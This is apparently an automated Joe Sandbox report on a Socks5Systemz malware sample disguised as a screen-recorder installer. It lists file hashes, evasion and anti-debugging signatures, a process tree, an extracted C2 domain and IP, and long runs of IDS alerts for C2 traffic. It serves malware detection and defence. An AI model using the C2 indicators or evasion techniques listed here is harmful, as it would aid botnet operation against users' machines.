Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AyiNxJ98mL.exe

Overview

General Information

Sample name:AyiNxJ98mL.exe
renamed because original name is a hash value
Original sample name:1d579066d7524921e14164ea1e9a9807.exe
Analysis ID:1527568
MD5:1d579066d7524921e14164ea1e9a9807
SHA1:a0f9d2a55afce02d9c42374c15f01b24ee9cdbdc
SHA256:6d6e762217ce4e36515634b7d8a420d8a752a1b430376df118ba2d178fcce61e
Tags:32exe
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
PE file has a writeable .text section
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • AyiNxJ98mL.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\AyiNxJ98mL.exe" MD5: 1D579066D7524921E14164EA1E9A9807)
    • AyiNxJ98mL.tmp (PID: 6896 cmdline: "C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp" /SL5="$20424,4742621,54272,C:\Users\user\Desktop\AyiNxJ98mL.exe" MD5: 16C9D19AB32C18671706CEFEE19B6949)
      • screencameralite32_64.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe" -i MD5: 9773013A29C2D339FD5258A117195F58)
  • cleanup
{"C2 list": ["aiwimwi.ru"]}
SourceRuleDescriptionAuthorStrings
00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000002.00000002.2965500570.0000000002BC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: screencameralite32_64.exe PID: 7088JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-07T03:41:58.187837+020020494671A Network Trojan was detected192.168.2.449747185.208.158.24880TCP
        2024-10-07T03:42:01.054787+020020494671A Network Trojan was detected192.168.2.449747185.208.158.24880TCP
        2024-10-07T03:42:01.407698+020020494671A Network Trojan was detected192.168.2.449747185.208.158.24880TCP
        2024-10-07T03:42:02.230670+020020494671A Network Trojan was detected192.168.2.449776185.208.158.24880TCP
        2024-10-07T03:42:03.108012+020020494671A Network Trojan was detected192.168.2.449782185.208.158.24880TCP
        2024-10-07T03:42:03.949540+020020494671A Network Trojan was detected192.168.2.449788185.208.158.24880TCP
        2024-10-07T03:42:04.766868+020020494671A Network Trojan was detected192.168.2.449794185.208.158.24880TCP
        2024-10-07T03:42:05.592224+020020494671A Network Trojan was detected192.168.2.449800185.208.158.24880TCP
        2024-10-07T03:42:06.406519+020020494671A Network Trojan was detected192.168.2.449806185.208.158.24880TCP
        2024-10-07T03:42:07.223683+020020494671A Network Trojan was detected192.168.2.449812185.208.158.24880TCP
        2024-10-07T03:42:08.069514+020020494671A Network Trojan was detected192.168.2.449818185.208.158.24880TCP
        2024-10-07T03:42:08.427179+020020494671A Network Trojan was detected192.168.2.449818185.208.158.24880TCP
        2024-10-07T03:42:09.260724+020020494671A Network Trojan was detected192.168.2.449827185.208.158.24880TCP
        2024-10-07T03:42:10.075961+020020494671A Network Trojan was detected192.168.2.449832185.208.158.24880TCP
        2024-10-07T03:42:10.887152+020020494671A Network Trojan was detected192.168.2.449837185.208.158.24880TCP
        2024-10-07T03:42:11.728146+020020494671A Network Trojan was detected192.168.2.449842185.208.158.24880TCP
        2024-10-07T03:42:12.076820+020020494671A Network Trojan was detected192.168.2.449842185.208.158.24880TCP
        2024-10-07T03:42:12.952536+020020494671A Network Trojan was detected192.168.2.449852185.208.158.24880TCP
        2024-10-07T03:42:13.773176+020020494671A Network Trojan was detected192.168.2.449857185.208.158.24880TCP
        2024-10-07T03:42:14.638684+020020494671A Network Trojan was detected192.168.2.449863185.208.158.24880TCP
        2024-10-07T03:42:15.469770+020020494671A Network Trojan was detected192.168.2.449869185.208.158.24880TCP
        2024-10-07T03:42:16.322119+020020494671A Network Trojan was detected192.168.2.449876185.208.158.24880TCP
        2024-10-07T03:42:17.183704+020020494671A Network Trojan was detected192.168.2.449883185.208.158.24880TCP
        2024-10-07T03:42:18.017782+020020494671A Network Trojan was detected192.168.2.449890185.208.158.24880TCP
        2024-10-07T03:42:18.834612+020020494671A Network Trojan was detected192.168.2.449896185.208.158.24880TCP
        2024-10-07T03:42:19.197405+020020494671A Network Trojan was detected192.168.2.449896185.208.158.24880TCP
        2024-10-07T03:42:19.542074+020020494671A Network Trojan was detected192.168.2.449896185.208.158.24880TCP
        2024-10-07T03:42:20.386996+020020494671A Network Trojan was detected192.168.2.449904185.208.158.24880TCP
        2024-10-07T03:42:21.218189+020020494671A Network Trojan was detected192.168.2.449908185.208.158.24880TCP
        2024-10-07T03:42:22.031745+020020494671A Network Trojan was detected192.168.2.449911185.208.158.24880TCP
        2024-10-07T03:42:22.840581+020020494671A Network Trojan was detected192.168.2.449915185.208.158.24880TCP
        2024-10-07T03:42:23.794239+020020494671A Network Trojan was detected192.168.2.449920185.208.158.24880TCP
        2024-10-07T03:42:24.614613+020020494671A Network Trojan was detected192.168.2.449926185.208.158.24880TCP
        2024-10-07T03:42:25.438023+020020494671A Network Trojan was detected192.168.2.449933185.208.158.24880TCP
        2024-10-07T03:42:26.264367+020020494671A Network Trojan was detected192.168.2.449940185.208.158.24880TCP
        2024-10-07T03:42:27.067852+020020494671A Network Trojan was detected192.168.2.449946185.208.158.24880TCP
        2024-10-07T03:42:27.897107+020020494671A Network Trojan was detected192.168.2.449952185.208.158.24880TCP
        2024-10-07T03:42:28.251909+020020494671A Network Trojan was detected192.168.2.449952185.208.158.24880TCP
        2024-10-07T03:42:29.068086+020020494671A Network Trojan was detected192.168.2.449961185.208.158.24880TCP
        2024-10-07T03:42:29.419270+020020494671A Network Trojan was detected192.168.2.449961185.208.158.24880TCP
        2024-10-07T03:42:30.236178+020020494671A Network Trojan was detected192.168.2.449969185.208.158.24880TCP
        2024-10-07T03:42:31.050989+020020494671A Network Trojan was detected192.168.2.449975185.208.158.24880TCP
        2024-10-07T03:42:31.860240+020020494671A Network Trojan was detected192.168.2.449982185.208.158.24880TCP
        2024-10-07T03:42:32.690546+020020494671A Network Trojan was detected192.168.2.449989185.208.158.24880TCP
        2024-10-07T03:42:33.492195+020020494671A Network Trojan was detected192.168.2.449996185.208.158.24880TCP
        2024-10-07T03:42:33.836058+020020494671A Network Trojan was detected192.168.2.449996185.208.158.24880TCP
        2024-10-07T03:42:34.679019+020020494671A Network Trojan was detected192.168.2.450003185.208.158.24880TCP
        2024-10-07T03:42:35.476473+020020494671A Network Trojan was detected192.168.2.450009185.208.158.24880TCP
        2024-10-07T03:42:35.820016+020020494671A Network Trojan was detected192.168.2.450009185.208.158.24880TCP
        2024-10-07T03:42:36.169186+020020494671A Network Trojan was detected192.168.2.450009185.208.158.24880TCP
        2024-10-07T03:42:36.973944+020020494671A Network Trojan was detected192.168.2.450020185.208.158.24880TCP
        2024-10-07T03:42:37.838645+020020494671A Network Trojan was detected192.168.2.450026185.208.158.24880TCP
        2024-10-07T03:42:38.705866+020020494671A Network Trojan was detected192.168.2.450034185.208.158.24880TCP
        2024-10-07T03:42:39.564963+020020494671A Network Trojan was detected192.168.2.450040185.208.158.24880TCP
        2024-10-07T03:42:40.450609+020020494671A Network Trojan was detected192.168.2.450046185.208.158.24880TCP
        2024-10-07T03:42:41.291929+020020494671A Network Trojan was detected192.168.2.450049185.208.158.24880TCP
        2024-10-07T03:42:42.118606+020020494671A Network Trojan was detected192.168.2.450050185.208.158.24880TCP
        2024-10-07T03:42:42.464349+020020494671A Network Trojan was detected192.168.2.450050185.208.158.24880TCP
        2024-10-07T03:42:43.306353+020020494671A Network Trojan was detected192.168.2.450051185.208.158.24880TCP
        2024-10-07T03:42:43.655033+020020494671A Network Trojan was detected192.168.2.450051185.208.158.24880TCP
        2024-10-07T03:42:44.463476+020020494671A Network Trojan was detected192.168.2.450052185.208.158.24880TCP
        2024-10-07T03:42:45.282696+020020494671A Network Trojan was detected192.168.2.450053185.208.158.24880TCP
        2024-10-07T03:42:46.194451+020020494671A Network Trojan was detected192.168.2.450054185.208.158.24880TCP
        2024-10-07T03:42:47.051855+020020494671A Network Trojan was detected192.168.2.450055185.208.158.24880TCP
        2024-10-07T03:42:47.864174+020020494671A Network Trojan was detected192.168.2.450056185.208.158.24880TCP
        2024-10-07T03:42:48.674462+020020494671A Network Trojan was detected192.168.2.450057185.208.158.24880TCP
        2024-10-07T03:42:49.578425+020020494671A Network Trojan was detected192.168.2.450058185.208.158.24880TCP
        2024-10-07T03:42:50.395648+020020494671A Network Trojan was detected192.168.2.450059185.208.158.24880TCP
        2024-10-07T03:42:51.216894+020020494671A Network Trojan was detected192.168.2.450060185.208.158.24880TCP
        2024-10-07T03:42:52.047574+020020494671A Network Trojan was detected192.168.2.450061185.208.158.24880TCP
        2024-10-07T03:42:52.909205+020020494671A Network Trojan was detected192.168.2.450062185.208.158.24880TCP
        2024-10-07T03:42:53.787719+020020494671A Network Trojan was detected192.168.2.450063185.208.158.24880TCP
        2024-10-07T03:42:54.697841+020020494671A Network Trojan was detected192.168.2.450064185.208.158.24880TCP
        2024-10-07T03:42:55.515668+020020494671A Network Trojan was detected192.168.2.450065185.208.158.24880TCP
        2024-10-07T03:42:56.351204+020020494671A Network Trojan was detected192.168.2.450066185.208.158.24880TCP
        2024-10-07T03:42:56.697681+020020494671A Network Trojan was detected192.168.2.450066185.208.158.24880TCP
        2024-10-07T03:42:57.534956+020020494671A Network Trojan was detected192.168.2.450067185.208.158.24880TCP
        2024-10-07T03:42:58.352171+020020494671A Network Trojan was detected192.168.2.450068185.208.158.24880TCP
        2024-10-07T03:42:59.285211+020020494671A Network Trojan was detected192.168.2.450069185.208.158.24880TCP
        2024-10-07T03:43:00.084617+020020494671A Network Trojan was detected192.168.2.450070185.208.158.24880TCP
        2024-10-07T03:43:00.913274+020020494671A Network Trojan was detected192.168.2.450071185.208.158.24880TCP
        2024-10-07T03:43:01.715725+020020494671A Network Trojan was detected192.168.2.450072185.208.158.24880TCP
        2024-10-07T03:43:02.556919+020020494671A Network Trojan was detected192.168.2.450073185.208.158.24880TCP
        2024-10-07T03:43:03.413248+020020494671A Network Trojan was detected192.168.2.450074185.208.158.24880TCP
        2024-10-07T03:43:04.234323+020020494671A Network Trojan was detected192.168.2.450075185.208.158.24880TCP
        2024-10-07T03:43:05.059239+020020494671A Network Trojan was detected192.168.2.450076185.208.158.24880TCP
        2024-10-07T03:43:05.915772+020020494671A Network Trojan was detected192.168.2.450077185.208.158.24880TCP
        2024-10-07T03:43:06.740206+020020494671A Network Trojan was detected192.168.2.450078185.208.158.24880TCP
        2024-10-07T03:43:07.572459+020020494671A Network Trojan was detected192.168.2.450079185.208.158.24880TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-07T03:41:58.187837+020020501121A Network Trojan was detected192.168.2.449747185.208.158.24880TCP
        2024-10-07T03:42:01.054787+020020501121A Network Trojan was detected192.168.2.449747185.208.158.24880TCP
        2024-10-07T03:42:01.407698+020020501121A Network Trojan was detected192.168.2.449747185.208.158.24880TCP
        2024-10-07T03:42:02.230670+020020501121A Network Trojan was detected192.168.2.449776185.208.158.24880TCP
        2024-10-07T03:42:03.108012+020020501121A Network Trojan was detected192.168.2.449782185.208.158.24880TCP
        2024-10-07T03:42:03.949540+020020501121A Network Trojan was detected192.168.2.449788185.208.158.24880TCP
        2024-10-07T03:42:04.766868+020020501121A Network Trojan was detected192.168.2.449794185.208.158.24880TCP
        2024-10-07T03:42:05.592224+020020501121A Network Trojan was detected192.168.2.449800185.208.158.24880TCP
        2024-10-07T03:42:06.406519+020020501121A Network Trojan was detected192.168.2.449806185.208.158.24880TCP
        2024-10-07T03:42:07.223683+020020501121A Network Trojan was detected192.168.2.449812185.208.158.24880TCP
        2024-10-07T03:42:08.069514+020020501121A Network Trojan was detected192.168.2.449818185.208.158.24880TCP
        2024-10-07T03:42:08.427179+020020501121A Network Trojan was detected192.168.2.449818185.208.158.24880TCP
        2024-10-07T03:42:09.260724+020020501121A Network Trojan was detected192.168.2.449827185.208.158.24880TCP
        2024-10-07T03:42:10.075961+020020501121A Network Trojan was detected192.168.2.449832185.208.158.24880TCP
        2024-10-07T03:42:10.887152+020020501121A Network Trojan was detected192.168.2.449837185.208.158.24880TCP
        2024-10-07T03:42:11.728146+020020501121A Network Trojan was detected192.168.2.449842185.208.158.24880TCP
        2024-10-07T03:42:12.076820+020020501121A Network Trojan was detected192.168.2.449842185.208.158.24880TCP
        2024-10-07T03:42:12.952536+020020501121A Network Trojan was detected192.168.2.449852185.208.158.24880TCP
        2024-10-07T03:42:13.773176+020020501121A Network Trojan was detected192.168.2.449857185.208.158.24880TCP
        2024-10-07T03:42:14.638684+020020501121A Network Trojan was detected192.168.2.449863185.208.158.24880TCP
        2024-10-07T03:42:15.469770+020020501121A Network Trojan was detected192.168.2.449869185.208.158.24880TCP
        2024-10-07T03:42:16.322119+020020501121A Network Trojan was detected192.168.2.449876185.208.158.24880TCP
        2024-10-07T03:42:17.183704+020020501121A Network Trojan was detected192.168.2.449883185.208.158.24880TCP
        2024-10-07T03:42:18.017782+020020501121A Network Trojan was detected192.168.2.449890185.208.158.24880TCP
        2024-10-07T03:42:18.834612+020020501121A Network Trojan was detected192.168.2.449896185.208.158.24880TCP
        2024-10-07T03:42:19.197405+020020501121A Network Trojan was detected192.168.2.449896185.208.158.24880TCP
        2024-10-07T03:42:19.542074+020020501121A Network Trojan was detected192.168.2.449896185.208.158.24880TCP
        2024-10-07T03:42:20.386996+020020501121A Network Trojan was detected192.168.2.449904185.208.158.24880TCP
        2024-10-07T03:42:21.218189+020020501121A Network Trojan was detected192.168.2.449908185.208.158.24880TCP
        2024-10-07T03:42:22.031745+020020501121A Network Trojan was detected192.168.2.449911185.208.158.24880TCP
        2024-10-07T03:42:22.840581+020020501121A Network Trojan was detected192.168.2.449915185.208.158.24880TCP
        2024-10-07T03:42:23.794239+020020501121A Network Trojan was detected192.168.2.449920185.208.158.24880TCP
        2024-10-07T03:42:24.614613+020020501121A Network Trojan was detected192.168.2.449926185.208.158.24880TCP
        2024-10-07T03:42:25.438023+020020501121A Network Trojan was detected192.168.2.449933185.208.158.24880TCP
        2024-10-07T03:42:26.264367+020020501121A Network Trojan was detected192.168.2.449940185.208.158.24880TCP
        2024-10-07T03:42:27.067852+020020501121A Network Trojan was detected192.168.2.449946185.208.158.24880TCP
        2024-10-07T03:42:27.897107+020020501121A Network Trojan was detected192.168.2.449952185.208.158.24880TCP
        2024-10-07T03:42:28.251909+020020501121A Network Trojan was detected192.168.2.449952185.208.158.24880TCP
        2024-10-07T03:42:29.068086+020020501121A Network Trojan was detected192.168.2.449961185.208.158.24880TCP
        2024-10-07T03:42:29.419270+020020501121A Network Trojan was detected192.168.2.449961185.208.158.24880TCP
        2024-10-07T03:42:30.236178+020020501121A Network Trojan was detected192.168.2.449969185.208.158.24880TCP
        2024-10-07T03:42:31.050989+020020501121A Network Trojan was detected192.168.2.449975185.208.158.24880TCP
        2024-10-07T03:42:31.860240+020020501121A Network Trojan was detected192.168.2.449982185.208.158.24880TCP
        2024-10-07T03:42:32.690546+020020501121A Network Trojan was detected192.168.2.449989185.208.158.24880TCP
        2024-10-07T03:42:33.492195+020020501121A Network Trojan was detected192.168.2.449996185.208.158.24880TCP
        2024-10-07T03:42:33.836058+020020501121A Network Trojan was detected192.168.2.449996185.208.158.24880TCP
        2024-10-07T03:42:34.679019+020020501121A Network Trojan was detected192.168.2.450003185.208.158.24880TCP
        2024-10-07T03:42:35.476473+020020501121A Network Trojan was detected192.168.2.450009185.208.158.24880TCP
        2024-10-07T03:42:35.820016+020020501121A Network Trojan was detected192.168.2.450009185.208.158.24880TCP
        2024-10-07T03:42:36.169186+020020501121A Network Trojan was detected192.168.2.450009185.208.158.24880TCP
        2024-10-07T03:42:36.973944+020020501121A Network Trojan was detected192.168.2.450020185.208.158.24880TCP
        2024-10-07T03:42:37.838645+020020501121A Network Trojan was detected192.168.2.450026185.208.158.24880TCP
        2024-10-07T03:42:38.705866+020020501121A Network Trojan was detected192.168.2.450034185.208.158.24880TCP
        2024-10-07T03:42:39.564963+020020501121A Network Trojan was detected192.168.2.450040185.208.158.24880TCP
        2024-10-07T03:42:40.450609+020020501121A Network Trojan was detected192.168.2.450046185.208.158.24880TCP
        2024-10-07T03:42:41.291929+020020501121A Network Trojan was detected192.168.2.450049185.208.158.24880TCP
        2024-10-07T03:42:42.118606+020020501121A Network Trojan was detected192.168.2.450050185.208.158.24880TCP
        2024-10-07T03:42:42.464349+020020501121A Network Trojan was detected192.168.2.450050185.208.158.24880TCP
        2024-10-07T03:42:43.306353+020020501121A Network Trojan was detected192.168.2.450051185.208.158.24880TCP
        2024-10-07T03:42:43.655033+020020501121A Network Trojan was detected192.168.2.450051185.208.158.24880TCP
        2024-10-07T03:42:44.463476+020020501121A Network Trojan was detected192.168.2.450052185.208.158.24880TCP
        2024-10-07T03:42:45.282696+020020501121A Network Trojan was detected192.168.2.450053185.208.158.24880TCP
        2024-10-07T03:42:46.194451+020020501121A Network Trojan was detected192.168.2.450054185.208.158.24880TCP
        2024-10-07T03:42:47.051855+020020501121A Network Trojan was detected192.168.2.450055185.208.158.24880TCP
        2024-10-07T03:42:47.864174+020020501121A Network Trojan was detected192.168.2.450056185.208.158.24880TCP
        2024-10-07T03:42:48.674462+020020501121A Network Trojan was detected192.168.2.450057185.208.158.24880TCP
        2024-10-07T03:42:49.578425+020020501121A Network Trojan was detected192.168.2.450058185.208.158.24880TCP
        2024-10-07T03:42:50.395648+020020501121A Network Trojan was detected192.168.2.450059185.208.158.24880TCP
        2024-10-07T03:42:51.216894+020020501121A Network Trojan was detected192.168.2.450060185.208.158.24880TCP
        2024-10-07T03:42:52.047574+020020501121A Network Trojan was detected192.168.2.450061185.208.158.24880TCP
        2024-10-07T03:42:52.909205+020020501121A Network Trojan was detected192.168.2.450062185.208.158.24880TCP
        2024-10-07T03:42:53.787719+020020501121A Network Trojan was detected192.168.2.450063185.208.158.24880TCP
        2024-10-07T03:42:54.697841+020020501121A Network Trojan was detected192.168.2.450064185.208.158.24880TCP
        2024-10-07T03:42:55.515668+020020501121A Network Trojan was detected192.168.2.450065185.208.158.24880TCP
        2024-10-07T03:42:56.351204+020020501121A Network Trojan was detected192.168.2.450066185.208.158.24880TCP
        2024-10-07T03:42:56.697681+020020501121A Network Trojan was detected192.168.2.450066185.208.158.24880TCP
        2024-10-07T03:42:57.534956+020020501121A Network Trojan was detected192.168.2.450067185.208.158.24880TCP
        2024-10-07T03:42:58.352171+020020501121A Network Trojan was detected192.168.2.450068185.208.158.24880TCP
        2024-10-07T03:42:59.285211+020020501121A Network Trojan was detected192.168.2.450069185.208.158.24880TCP
        2024-10-07T03:43:00.084617+020020501121A Network Trojan was detected192.168.2.450070185.208.158.24880TCP
        2024-10-07T03:43:00.913274+020020501121A Network Trojan was detected192.168.2.450071185.208.158.24880TCP
        2024-10-07T03:43:01.715725+020020501121A Network Trojan was detected192.168.2.450072185.208.158.24880TCP
        2024-10-07T03:43:02.556919+020020501121A Network Trojan was detected192.168.2.450073185.208.158.24880TCP
        2024-10-07T03:43:03.413248+020020501121A Network Trojan was detected192.168.2.450074185.208.158.24880TCP
        2024-10-07T03:43:04.234323+020020501121A Network Trojan was detected192.168.2.450075185.208.158.24880TCP
        2024-10-07T03:43:05.059239+020020501121A Network Trojan was detected192.168.2.450076185.208.158.24880TCP
        2024-10-07T03:43:05.915772+020020501121A Network Trojan was detected192.168.2.450077185.208.158.24880TCP
        2024-10-07T03:43:06.740206+020020501121A Network Trojan was detected192.168.2.450078185.208.158.24880TCP
        2024-10-07T03:43:07.572459+020020501121A Network Trojan was detected192.168.2.450079185.208.158.24880TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C:\ProgramData\Escape Division LIB 10.6.45\Escape Division LIB 10.6.45.exeAvira: detection malicious, Label: HEUR/AGEN.1329998
        Source: screencameralite32_64.exe.7088.2.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["aiwimwi.ru"]}
        Source: C:\ProgramData\Escape Division LIB 10.6.45\Escape Division LIB 10.6.45.exeVirustotal: Detection: 39%Perma Link
        Source: AyiNxJ98mL.exeVirustotal: Detection: 23%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\ProgramData\Escape Division LIB 10.6.45\Escape Division LIB 10.6.45.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D4EC
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0045D5A0 ArcFourCrypt,1_2_0045D5A0
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0045D5B8 ArcFourCrypt,1_2_0045D5B8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

        Compliance

        barindex
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeUnpacked PE file: 2.2.screencameralite32_64.exe.400000.0.unpack
        Source: AyiNxJ98mL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Screen Camera Lite_is1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00452A4C FindFirstFileA,GetLastError,1_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,1_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497A74

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49747 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49782 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49800 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49818 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49747 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49782 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49818 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49827 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49837 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49837 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49832 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49869 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49832 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49842 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49800 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49863 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49863 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49890 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49890 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49812 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49812 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49842 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49788 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49876 -> 185.208.158.248:80
